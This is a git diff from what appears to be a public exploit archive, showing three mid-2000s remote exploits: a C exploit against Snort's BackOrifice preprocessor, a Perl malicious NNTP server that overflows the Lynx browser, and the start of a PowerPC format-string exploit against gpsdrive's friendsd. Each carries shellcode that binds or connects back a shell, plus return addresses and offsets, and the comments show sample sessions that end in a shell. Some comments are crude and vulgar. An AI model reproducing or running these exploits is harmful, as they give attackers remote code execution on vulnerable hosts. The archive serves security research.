BO Packet Format (Ref: http://www.magnux.org/~flaviovs/boproto.html) + * Mnemonic Size in bytes + * MAGIC 8 + * LEN 4 + * ID 4 + * T 1 + * DATA variable + * CRC 1 + * + * On x86, because of the stack layout, we end up overwriting + * the loop counter (i and len). 
To solve this problem, we + * can set back the approriate value for i and len. We can + * also able to set a NULL byte to stop the loop. + * + * There is no chance for bruteforce, snort will die after the + * first bad try. On Linux system with kernel 2.6 with VA + * randomized, it would be much harder for a reliable exploit. + * + * + * In case of _non-optimized_ compiled snort binary, the stack + * would looks like this: + * + * [ buf1 ]..[ i ]..[ len ]..[ebp][eip][*p][*pkt_data] + * + * The exploit could be reliable in this case, by using a + * pop/ret return addess. Lets send to snort a UDP packet + * as the following: + * + * [ BO HEADERS ][ .. ][ i ][ .. ][ len ][ .. ][ ret addr ][ NOP ][ shellcode ] + * [ Encrypted ][ Non Encrypted ] + * + * When the overwriting loop stop, pkt_data will point to + * the memory after return address (NOP part) in raw packet + * data. So, using a return address that points to POP/RET + * instructions would be enough for a reliable exploit. + * (objdump -d binary|grep -B1 ret|grep -A1 pop to find one) + * + * This method will work well under linux kernel 2.6 with VA + * randomized also. + * + * In case of optimized binary, it would be harder since + * the counter i, len and buffer pointers could/possibly be + * registered variables. And the register points to buffer + * get poped from stack when the funtion return. In this case, + * the return address should be hard-coded but it would be + * unreliable (especially on linux kernel 2.6 with VA + * randomization patch). + * + * This exploit would generally work. 
Providing that you know + * how to find and use correct offsets and return address :> + * + * + * Example: + * + * $ ./THCsnortbo + * Snort BackOrifice PING exploit (version 0.3) + * by rd@thc.org + * + * Usage: ./THCsnortbo host target + * + * Available Targets: + * 1 | manual testing gcc with -O0 + * 2 | manual testing gcc with -O2 + * + * $ ./snortbo 192.168.0.101 1 + * Snort BackOrifice PING exploit (version 0.3) + * by rd@thc.org + * + * Selected target: + * 1 | manual testing gcc with -O0 + * + * Sending exploit to 192.168.0.101 + * Done. + * + * $ nc 192.168.0.101 31337 + * id + * uid=104(snort) gid=409(snort) groups=409(snort) + * uname -sr + * Linux 2.6.11-hardened-r1 + * + */ + +#include +#include +#include +#include +#include +#include +#include +#ifdef HAVE_UNISTD_H +#include +#endif +#ifdef HAVE_SYS_TIME_H +#include +#endif +#ifdef HAVE_SYS_SELECT_H +#include +#endif +#ifdef HAVE_STRINGS_H +#include +#endif +#ifdef HAVE_MALLOC_H +#include +#endif +#include +#include +#include + +#define VERSION "0.3" + +/* shellcodes */ + +/* a quick test bind shellcode on port 31337 from metasploit + * + * Connect back shellcode for snort exploit should be better, do + * it by yourself. 
im lazy :> + */ +unsigned char x86_lnx_bind[] = +"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +"\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +"\x89\xe1\xcd\x80"; + +typedef struct { + char *desc; // description + unsigned char *scode; // shellcode + unsigned int scode_len; + unsigned long retaddr; // return address + unsigned int i_var_off; // offset from buf1 to variable 'i' + unsigned int len_var_off; // offset from buf1 to variable 'len' + unsigned int ret_off; // offset from buf1 to saved eip + unsigned int datasize; // value of size field in BO ping packet +} t_target; + +t_target targets[] = { + { + "manual testing gcc with -O0", + x86_lnx_bind, sizeof(x86_lnx_bind), + //0x0804aa07, + 0x4008f000+0x16143, // pop/ret in libc + 1024+1+32, 1024+1+44, 1024+1+60, + 0xFFFFFFFF + }, + { + "manual testing gcc with -O2", + x86_lnx_bind, sizeof(x86_lnx_bind), + 0x0804aa07, //0xbfffe9e0 + 1024+1+8, 1024+1+20, 1024+1+44, + 1048+4+24 + }, + { NULL, NULL, 0, 0, 0, 0, 0, 0 } +}; + +#define PACKETSIZE 1400 +#define OVERFLOW_BUFFSZ 1024 +#define IVAL 0x11223344; +#define LVAL 0x11223354+16; + +#define ARGSIZE 256 +#define PORT 53 +#define MAGICSTRING "*!*QWTY?" 
+#define MAGICSTRINGLEN 8 +#define TYPE_PING 0x01 + +static long holdrand = 1L; +char g_password[ARGSIZE]; +int port = PORT; + +/* + * borrowed some code from BO client + */ +void msrand (unsigned int seed ) +{ + holdrand = (long)seed; +} + +int mrand ( void) +{ + return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff); +} + +unsigned int getkey() +{ + int x, y; + unsigned int z; + + y = strlen(g_password); + if (!y) + return 31337; + else { + z = 0; + for (x = 0; x < y; x++) + z+= g_password[x]; + + for (x = 0; x < y; x++) { + if (x%2) + z-= g_password[x] * (y-x+1); + else + z+= g_password[x] * (y-x+1); + z = z%RAND_MAX; + } + + z = (z * y)%RAND_MAX; + return z; + } +} + +void BOcrypt(unsigned char *buff, int len) +{ + int y; + + if (!len) + return; + + msrand(getkey()); + for (y = 0; y < len; y++) + buff[y] = buff[y] ^ (mrand()%256); +} + +void explbuild(unsigned char *buff, t_target *t) +{ + unsigned char *ptr; + unsigned long *pdw; + unsigned long size; + unsigned char *scode; + unsigned int scode_len; + unsigned long retaddr; + unsigned int i_var_off; + unsigned int len_var_off; + unsigned int ret_off; + unsigned int datasize; + + scode = t->scode; + scode_len = t->scode_len; + retaddr = t->retaddr; + i_var_off = t->i_var_off; + len_var_off = t->len_var_off; + ret_off = t->ret_off; + datasize = t->datasize; + + memset(buff, 0x90, PACKETSIZE); + buff[PACKETSIZE - 1] = 0; + + strcpy(buff, MAGICSTRING); + + pdw = (unsigned long *)(buff + MAGICSTRINGLEN); + *pdw++ = datasize; + *pdw++ = (unsigned long)-1; + ptr = (unsigned char *)pdw; + *ptr++ = TYPE_PING; + + size = IVAL; + memcpy(buff + i_var_off, &size, 4); + size = LVAL; + memcpy(buff + len_var_off, &size, 4); + + memcpy(buff + ret_off, &retaddr, 4); + + /* you may want to place shellcode on encrypted part and will + * be decrypted into buf1 by BoGetDirection + */ + // memcpy(buff + OVERFLOW_BUFFSZ - scode_len - 128, + // (char *) scode, scode_len); + + memcpy(buff + PACKETSIZE - scode_len - 1, 
(char *)scode, scode_len); + + /* you may want to set NULL byte to stop the loop here, but it + * won't work with pop/ret method + */ + // buff[ret_off + 4] = 0; + + size = ret_off + 4; + BOcrypt(buff, (int)size); +} + +int sendping(unsigned long dest, int port, int sock, unsigned char *buff) +{ + struct sockaddr_in host; + int i, size; + fd_set fdset; + struct timeval tv; + + size=PACKETSIZE; + host.sin_family = AF_INET; + host.sin_port = htons((u_short)port); + host.sin_addr.s_addr = dest; + + FD_ZERO(&fdset); + FD_SET(sock, &fdset); + tv.tv_sec = 10; + tv.tv_usec = 0; + + i = select(sock+1, NULL, &fdset, NULL, &tv); + if (i == 0) { + printf("Timeout\n"); + return(1); + } else if (i < 0) { + perror("select: "); + return(1); + } + + if ( (sendto(sock, buff, size, 0, + (struct sockaddr *)&host, sizeof(host))) != size ) { + perror("sendto: "); + return(1); + } + + return 0; +} + +void usage(char *prog) +{ + int n; + + printf("Usage: %s host target\n\nAvailable Targets:\n", prog); + + for (n = 0 ; targets[n].desc != NULL ; n++) + printf ("%3d | %s\n", n + 1, targets[n].desc); + printf (" \n"); +} + + +int main(int argc, char **argv) +{ + struct in_addr hostin; + unsigned long dest; + char buff[PACKETSIZE]; + int ntarget; + + printf("Snort BackOrifice PING exploit (version "VERSION")\n" + "by rd@thc.org\n\n"); + + if (argc < 3 || ((ntarget = atoi(argv[2])) <= 0) ) { + usage(argv[0]); + return 0; + } + + if (ntarget >= (sizeof(targets) / sizeof(t_target))) { + printf ("WARNING: target out of list. list:\n\n"); + usage(argv[0]); + return 0; + } + + ntarget = ntarget - 1; + + // change the key here to avoid the detection of a simple + // packet matching IDS signature. 
+ g_password[0] = 0; + + if ( (dest = inet_addr(argv[1])) == (unsigned long)-1) + printf("Bad IP: '%s'\n", argv[1]); + else { + int s; + hostin.s_addr = dest; + s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP); + + printf("Selected target:\n%3d | %s\n", ntarget+1, + targets[ntarget].desc); + explbuild(buff, &targets[ntarget]); + + printf("\nSending exploit to %s\n", inet_ntoa(hostin)); + if (sendping(dest, port, s, buff)) + printf("Sending exploit failed for dest %s\n", + inet_ntoa(hostin)); + printf("Done.\n"); + } + + return 0; +} + +// milw0rm.com [2005-10-25] diff --git a/platforms/linux/remote/1288.pl b/platforms/linux/remote/1288.pl index ccd71733a..4ec91d9cf 100755 --- a/platforms/linux/remote/1288.pl +++ b/platforms/linux/remote/1288.pl 
@@ -1,205 +1,205 @@ -#!/usr/bin/perl -- - -# lynx-nntp-server -# by Ulf Harnhammar in 2005 -# I hereby place this program in the public domain. - -#********************************************************************************* -#********************************************************************************* -# -# edited by xwings in 1st Nov 2005 , xwings at xwings.net -# -# For all my friends in #mantis @ ptp -# -# 14:21 < mark> xwings -# 14:21 < mark> wanna fuck -# 14:21 < xwings> mark: sure -# 14:21 < mark> sweet -# 14:21 * mark gets his lingerie -# -# Why lynx ? I guess ... I am bored ... :p -# -# Metasploit Port Bind Shellcode , Port : 3964 -# -# Downloaded lynx from : -# ftp://lynx.isc.org/lynx-2.8.3/lynx2-8-3.tar.gz -# -# Configure , make , make install under Kubuntu 5.10 (Breezy). -# gcc version 4.0.2 20050808 (prerelease) (Ubuntu 4.0.1-4ubuntu9) -# Linux note 2.6.12-9-386 #1 Mon Oct 10 13:14:36 BST 2005 i686 GNU/Linux -# -# (01:24:12).xwings@note.$ /home/xwings/usr/bin/lynx -version -# -# Lynx Version 2.8.3rel.1 (23 Apr 2000) -# Built on linux-gnu Oct 22 2005 23:44:16 -# -# Copyrights held by the University of Kansas, CERN, and other contributors. -# Distributed under the GNU General Public License. -# See http://lynx.browser.org/ and the online help for more information. -# -# *** [ Screen 1 ] *** -# (01:21:30).xwings@note.$ sudo perl lynx-nntp-server.pl -# connection from 127.0.0.1 -# SENT: 200 Internet News -# RECEIVED: mode reader -# SENT: 200 Internet News -# RECEIVED: GROUP my.server -# SENT: 211 1 1 1 my.server -# RECEIVED: HEAD 1 -# SENT: 221 1 -# Path: host!someotherhost!onemorehost -# 
From: -# Subject: $@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU -# (JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU -# (JUUFFFFFF1É.���$�s����cB�k C�i�VRaoZg�WaoX��bS͹��{�XX��X.�Xi -# �YoambRaoEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE -# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE -# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE -# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE -# AAAAAAAAAABBBBBBBBBBCCCCCCCC� -# Newsgroup: my.server -# Message-ID: -# . -# TIMED OUT -# RECEIVED: -# closed -# -# *** [ Screen 2 ] *** -# (01:21:39).xwings@note.$ sudo ./lynx nntp://localhost/my.server -# -# *** [ Screen 3 ] *** -# (11:53:41).xwings@note.<~>$ nc localhost 3964 -# id -# uid=0(root) gid=0(root) groups=0(root) -# -#********************************************************************* -#********************************************************************* - -use strict; -use IO::Socket; - -$main::port = 119; -$main::timeout = 5; - - -# *** SUBROUTINES *** - - -sub mysend($$) -{ - my $file = shift; - my $str = shift; - - print $file "$str\n"; - print "SENT: $str\n"; -} # sub mysend - - -sub myreceive($) -{ - my $file = shift; - my $inp; - - eval - { - local $SIG{ALRM} = sub { die "alarm\n" }; - alarm $main::timeout; - $inp = <$file>; - alarm 0; - }; - - if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } - $inp =~ tr/\015\012\000//d; - print "RECEIVED: $inp\n"; - $inp; -} # sub myreceive - - -# *** MAIN PROGRAM *** - - -{ - my $server = IO::Socket::INET->new( Proto => 'tcp', - LocalPort => $main::port, - Listen => SOMAXCONN, - Reuse => 1); - die "can't set up server!\n" unless $server; - - - while (my $client = $server->accept()) - { - $client->autoflush(1); - print 'connection from '.$client->peerhost."\n"; - - - mysend($client, '200 Internet News'); - my $group = 'alt.angst'; - - while (my $str = myreceive($client)) - { - if ($str =~ m/^mode reader$/i) - { - mysend($client, '200 
Internet News'); - next; - } - - if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i) - { - $group = $1; - mysend($client, "211 1 1 1 $group"); - next; - } - - if ($str =~ m/^quit$/i) - { - mysend($client, '205 Goodbye'); - last; - } - - if ($str =~ m/^head ([0-9]+)$/i) - { - my $evil = '$@UU(JUU' x 15; # Edit the number! - #$evil .= 'A' x (504 - length $evil); <-- I don't need this .. - - ## Added by xwings - - $evil .= 'F' x 6; # Where is my shell ? - $evil .= "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8". - "\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b". - "\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52". - "\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2". - "\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58". - "\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69". - "\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81"; - $evil .= 'E' x 236; # Initial Marker - $evil .= 'A' x 10; # Move Abit Further - $evil .= 'B' x 10; # Oh .. Abit more - $evil .= 'C' x 8; # Nearer ... - $evil .= "\x9c\xdf\xff\xbf"; #RET 0xbfffdf9c - - ## End of Add , xwings - - my $head = < -Path: host!someotherhost!onemorehost -From: -Subject: $evil -Newsgroup: $group -Message-ID: -. -HERE - - $head =~ s|\s+$||s; - mysend($client, $head); - next; - } - - mysend($client, '500 Syntax Error'); - } # while str=myreceive(client) - - close $client; - print "closed\n\n\n"; - } # while client=server->accept() -} - -# milw0rm.com [2005-11-02] +#!/usr/bin/perl -- + +# lynx-nntp-server +# by Ulf Harnhammar in 2005 +# I hereby place this program in the public domain. 
+ +#********************************************************************************* +#********************************************************************************* +# +# edited by xwings in 1st Nov 2005 , xwings at xwings.net +# +# For all my friends in #mantis @ ptp +# +# 14:21 < mark> xwings +# 14:21 < mark> wanna fuck +# 14:21 < xwings> mark: sure +# 14:21 < mark> sweet +# 14:21 * mark gets his lingerie +# +# Why lynx ? I guess ... I am bored ... :p +# +# Metasploit Port Bind Shellcode , Port : 3964 +# +# Downloaded lynx from : +# ftp://lynx.isc.org/lynx-2.8.3/lynx2-8-3.tar.gz +# +# Configure , make , make install under Kubuntu 5.10 (Breezy). +# gcc version 4.0.2 20050808 (prerelease) (Ubuntu 4.0.1-4ubuntu9) +# Linux note 2.6.12-9-386 #1 Mon Oct 10 13:14:36 BST 2005 i686 GNU/Linux +# +# (01:24:12).xwings@note.$ /home/xwings/usr/bin/lynx -version +# +# Lynx Version 2.8.3rel.1 (23 Apr 2000) +# Built on linux-gnu Oct 22 2005 23:44:16 +# +# Copyrights held by the University of Kansas, CERN, and other contributors. +# Distributed under the GNU General Public License. +# See http://lynx.browser.org/ and the online help for more information. +# +# *** [ Screen 1 ] *** +# (01:21:30).xwings@note.$ sudo perl lynx-nntp-server.pl +# connection from 127.0.0.1 +# SENT: 200 Internet News +# RECEIVED: mode reader +# SENT: 200 Internet News +# RECEIVED: GROUP my.server +# SENT: 211 1 1 1 my.server +# RECEIVED: HEAD 1 +# SENT: 221 1 +# Path: host!someotherhost!onemorehost +# 
From: +# Subject: $@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU +# (JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU +# (JUUFFFFFF1É.���$�s����cB�k C�i�VRaoZg�WaoX��bS͹��{�XX��X.�Xi +# �YoambRaoEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE +# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE +# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE +# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE +# AAAAAAAAAABBBBBBBBBBCCCCCCCC� +# Newsgroup: my.server +# Message-ID: +# . +# TIMED OUT +# RECEIVED: +# closed +# +# *** [ Screen 2 ] *** +# (01:21:39).xwings@note.$ sudo ./lynx nntp://localhost/my.server +# +# *** [ Screen 3 ] *** +# (11:53:41).xwings@note.<~>$ nc localhost 3964 +# id +# uid=0(root) gid=0(root) groups=0(root) +# +#********************************************************************* +#********************************************************************* + +use strict; +use IO::Socket; + +$main::port = 119; +$main::timeout = 5; + + +# *** SUBROUTINES *** + + +sub mysend($$) +{ + my $file = shift; + my $str = shift; + + print $file "$str\n"; + print "SENT: $str\n"; +} # sub mysend + + +sub myreceive($) +{ + my $file = shift; + my $inp; + + eval + { + local $SIG{ALRM} = sub { die "alarm\n" }; + alarm $main::timeout; + $inp = <$file>; + alarm 0; + }; + + if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } + $inp =~ tr/\015\012\000//d; + print "RECEIVED: $inp\n"; + $inp; +} # sub myreceive + + +# *** MAIN PROGRAM *** + + +{ + my $server = IO::Socket::INET->new( Proto => 'tcp', + LocalPort => $main::port, + Listen => SOMAXCONN, + Reuse => 1); + die "can't set up server!\n" unless $server; + + + while (my $client = $server->accept()) + { + $client->autoflush(1); + print 'connection from '.$client->peerhost."\n"; + + + mysend($client, '200 Internet News'); + my $group = 'alt.angst'; + + while (my $str = myreceive($client)) + { + if ($str =~ m/^mode reader$/i) + { + mysend($client, '200 
Internet News'); + next; + } + + if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i) + { + $group = $1; + mysend($client, "211 1 1 1 $group"); + next; + } + + if ($str =~ m/^quit$/i) + { + mysend($client, '205 Goodbye'); + last; + } + + if ($str =~ m/^head ([0-9]+)$/i) + { + my $evil = '$@UU(JUU' x 15; # Edit the number! + #$evil .= 'A' x (504 - length $evil); <-- I don't need this .. + + ## Added by xwings + + $evil .= 'F' x 6; # Where is my shell ? + $evil .= "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8". + "\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b". + "\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52". + "\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2". + "\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58". + "\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69". + "\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81"; + $evil .= 'E' x 236; # Initial Marker + $evil .= 'A' x 10; # Move Abit Further + $evil .= 'B' x 10; # Oh .. Abit more + $evil .= 'C' x 8; # Nearer ... + $evil .= "\x9c\xdf\xff\xbf"; #RET 0xbfffdf9c + + ## End of Add , xwings + + my $head = < +Path: host!someotherhost!onemorehost +From: +Subject: $evil +Newsgroup: $group +Message-ID: +. +HERE + + $head =~ s|\s+$||s; + mysend($client, $head); + next; + } + + mysend($client, '500 Syntax Error'); + } # while str=myreceive(client) + + close $client; + print "closed\n\n\n"; + } # while client=server->accept() +} + +# milw0rm.com [2005-11-02] diff --git a/platforms/linux/remote/1290.pl b/platforms/linux/remote/1290.pl index 28e21d206..08559fcab 100755 --- a/platforms/linux/remote/1290.pl +++ b/platforms/linux/remote/1290.pl 
@@ -1,179 +1,179 @@ -#!/usr/bin/perl -w -# -# Heh - Code by KF (kf_lists[at]digital_munition[dot]com) -# - Shellcode by Charles Stevenson -# http://www.digitalmunition.com -# -# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles. -# Free 14 day Testicle licking trial available! -# -# IIIIIIIIII -# I::::::::I -# I::::::::I -# II::::::II -# I::::I -# I::::I ## ## ####### ######## ## ## -# I::::I ## ## ## ## ## ## #### -# EEEEEEEEEEEEEEEEEEEEEE I::::I ## ## ## ## ######## ## -# E::::::::::::::::::::E I::::I ## ## ## ## ## ## ## -# E::::::::::::::::::::E I::::I ## ## ## ## ## ## ## -# EE::::::EEEEEEEEE::::E I::::I ### ####### ## ## ## -# E:::::E EEEEEE I::::I -# E:::::E II::::::II -# E::::::EEEEEEEEEE I::::::::I -# E:::::::::::::::E and I::::::::I -# E:::::::::::::::E IIIIIIIIII -# E::::::EEEEEEEEEE ######## ####### ## ## ## ## -# E:::::E ## ## ## ## ### ## ## ## -# E:::::E EEEEEE ## ## ## ## #### ## #### -# EE::::::EEEEEEEE:::::E ######## ## ## ## ## ## ## -# E::::::::::::::::::::E ## ## ## ## ## #### ## -# E::::::::::::::::::::E ## ## ## ## ## ### ## -# EEEEEEEEEEEEEEEEEEEEEE ######## ####### ## ## ## -# (Kickin you all up in your grill piece since the early 90's) -# -# friendsd.c:367: fprintf (stderr, txt); -# -# Tested against: gpsdrive_2.09-2_powerpc.deb -# -# Crash the program and go to frame 2 -# 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6 -# (gdb) bt -# #0 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6 -# #1 0x0f67cc74 in vfprintf () from /lib/tls/libc.so.6 -# #2 0x0f6825d0 in fprintf () from /lib/tls/libc.so.6 -# #3 0x100024b8 in dg_echo () -# #4 0x10002f28 in main () -# -# Grab the address of Arglist for frame 2 and overwrite that +4 -# (gdb) i f -# Stack level 2, frame at 0x7fffad70: -# pc = 0xf6825d0 in fprintf; saved pc 0x100024b8 -# called by frame at 0x7fffae00, caller of frame at 0x7fff8700 -# Arglist at 0x7fffad70, args: -# Locals at 0x7fffad70, Previous frame's sp in r1 -# -# (gdb) x/a 0x7fffad70+4 -# 0x7fffad74: 0xf6825d0 
(overwrite this) -# -# animosity:/home/kfinisterre# nc -l -p 31337 -vvv -# listening on [any] 31337 ... -# 192.168.1.1: inverse host lookup failed: Unknown host -# connect to [192.168.1.1] from (UNKNOWN) [192.168.1.1] 3349 -# id; -# uid=1000(kfinisterre) gid=1000(kfinisterre) -# groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre) -# uname -a; -# Linux animosity 2.6.11-powerpc #1 Fri May 13 15:47:19 CEST 2005 ppc GNU/Linux -# -# This is NOT reliable or robust... Find your own damn pointers to overwrite - -use Net::Friends; -use Data::Dumper; - -$shellcode = -"\x69\x69\x69\x69" . -# /* connect-core5.c by Charles Stevenson */ -"\x7c\x3f\x0b\x78" . #/*mr r31,r1*/ -"\x3b\x40\x01\x0e" . #/*li r26,270*/ -"\x3b\x5a\xfe\xf4" . #/*addi r26,r26,-268*/ -"\x7f\x43\xd3\x78" . #/*mr r3,r26*/ -"\x3b\x60\x01\x0d" . #/*li r27,269*/ -"\x3b\x7b\xfe\xf4" . #/*addi r27,r27,-268*/ -"\x7f\x64\xdb\x78" . #/*mr r4,r27*/ -"\x7c\xa5\x2a\x78" . #/*xor r5,r5,r5*/ -"\x7c\x3c\x0b\x78" . #/*mr r28,r1*/ -"\x3b\x9c\x01\x0c" . #/*addi r28,r28,268*/ -"\x90\x7c\xff\x08" . #/*stw r3,-248(r28)*/ -"\x90\x9c\xff\x0c" . #/*stw r4,-244(r28)*/ -"\x90\xbc\xff\x10" . #/*stw r5,-240(r28)*/ -"\x7f\x63\xdb\x78" . #/*mr r3,r27*/ -"\x3b\xdf\x01\x0c" . #/*addi r30,r31,268*/ -"\x38\x9e\xff\x08" . #/*addi r4,r30,-248*/ -"\x3b\x20\x01\x98" . #/*li r25,408*/ -"\x7f\x20\x16\x70" . #/*srawi r0,r25,2*/ -"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ -"\x7c\x78\x1b\x78" . #/*mr r24,r3*/ -"\xb3\x5e\xff\x16" . #/*sth r26,-234(r30)*/ -"\x7f\xbd\xea\x78" . #/*xor r29,r29,r29*/ -#// Craft your exploit to poke these value in. Right now it's set -#// for port 31337 and ip 192.168.1.1. Here's an example -#// core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1 -#// 0xc0a8 -#// 0x0101 -"\x63\xbd" . # /* PORT # */ -"\x7a\x69" . #/*ori r29,r29,31337*/ -"\xb3\xbe\xff\x18" . #/*sth r29,-232(r30)*/ -"\x3f\xa0" . # /*IP(A.B) */ -#"\x42\x07" . # wtf is this? -"\xc0\xa8" . 
# /*lis r29,-16216*/ -"\x63\xbd" . # /*IP(C.D) */ -#"\xa1\x39" . # wtf is this? -"\x01\x01" . # /*ori r29,r29,257*/ -"\x93\xbe\xff\x1a" . #/*stw r29,-230(r30)*/ -"\x93\x1c\xff\x08" . #/*stw r24,-248(r28)*/ -"\x3a\xde\xff\x16" . #/*addi r22,r30,-234*/ -"\x92\xdc\xff\x0c" . #/*stw r22,-244(r28)*/ -"\x3b\xa0\x01\x1c" . #/*li r29,284*/ -"\x38\xbd\xfe\xf4" . #/*addi r5,r29,-268*/ -"\x90\xbc\xff\x10" . #/*stw r5,-240(r28)*/ -"\x7f\x20\x16\x70" . #/*srawi r0,r25,2*/ -"\x7c\x7a\xda\x14" . #/*add r3,r26,r27*/ -"\x38\x9c\xff\x08" . #/*addi r4,r28,-248*/ -"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ -"\x7f\x03\xc3\x78" . #/*mr r3,r24*/ -"\x7c\x84\x22\x78" . #/*xor r4,r4,r4*/ -"\x3a\xe0\x01\xf8" . #/*li r23,504*/ -"\x7e\xe0\x1e\x70" . #/*srawi r0,r23,3*/ -"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ -"\x7f\x03\xc3\x78" . #/*mr r3,r24*/ -"\x7f\x64\xdb\x78" . #/*mr r4,r27*/ -"\x7e\xe0\x1e\x70" . #/*srawi r0,r23,3*/ -"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ -#// comment out the next 4 lines to save 16 bytes and lose stderr -#//"\x7f\x03\xc3\x78" /*mr r3,r24*/ -#//"\x7f\x44\xd3\x78" /*mr r4,r26*/ -#//"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ -#//"\x44\xde\xad\xf2" /*.long0x44deadf2*/ -"\x7c\xa5\x2a\x79" . #/*xor. r5,r5,r5*/ -"\x42\x40\xff\x35" . #/*bdzl+ 10000454
*/ -"\x7f\x08\x02\xa6" . #/*mflr r24*/ -"\x3b\x18\x01\x34" . #/*addi r24,r24,308*/ -"\x98\xb8\xfe\xfb" . #/*stb r5,-261(r24)*/ /* KF / Core / Ghandi mojo */ -"\x38\x78\xfe\xf4" . #/*addi r3,r24,-268*/ -"\x90\x61\xff\xf8" . #/*stw r3,-8(r1)*/ -"\x38\x81\xff\xf8" . #/*addi r4,r1,-8*/ -"\x90\xa1\xff\xfc" . #/*stw r5,-4(r1)*/ -"\x3b\xc0\x01\x60" . #/*li r30,352*/ -"\x7f\xc0\x2e\x70" . #/*srawi r0,r30,5*/ -"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ -"/bin/shZ"; # /* Z will become NULL */ - -$name = 'aaaaaaaa-aaaa'; - -$writeaddr = 0x7fffad74; # Saved ret in frame 2 Arglist+4 (inside gdb) -$writeaddr = 0x7fffad94; # (outside gdb) Pladow! Kickin fools all up in the grill piece. - -$addy = pack('l', $writeaddr); -$addy2 = pack('l', $writeaddr+2); - -#$instr = 0x7fffae84; # Shellcode (inside gdb) -$instr = 0x7fffaea4; # Shellcode (outside gdb) - -$lo = ($instr >> 0) & 0xffff; -$hi = ($instr >> 16) & 0xffff; - -$hi = $hi - 0x4e; -$lo = (0x10000 + $lo) - $hi - 0x50; - -#$hi = 1; $lo =1; - -$dir = "$addy$addy2|%." . $hi . "d|%28\$hn|%." . $lo . "d|%29\$hn$shellcode"; - -$friends = Net::Friends->new(shift || 'localhost'); -$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir); -print Dumper($friends->query); - -# P.S. Fsck drow! And did I mention k-otick blows! Gimme some freedom fries you bastards! - -# milw0rm.com [2005-11-04] +#!/usr/bin/perl -w +# +# Heh - Code by KF (kf_lists[at]digital_munition[dot]com) +# - Shellcode by Charles Stevenson +# http://www.digitalmunition.com +# +# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles. +# Free 14 day Testicle licking trial available! 
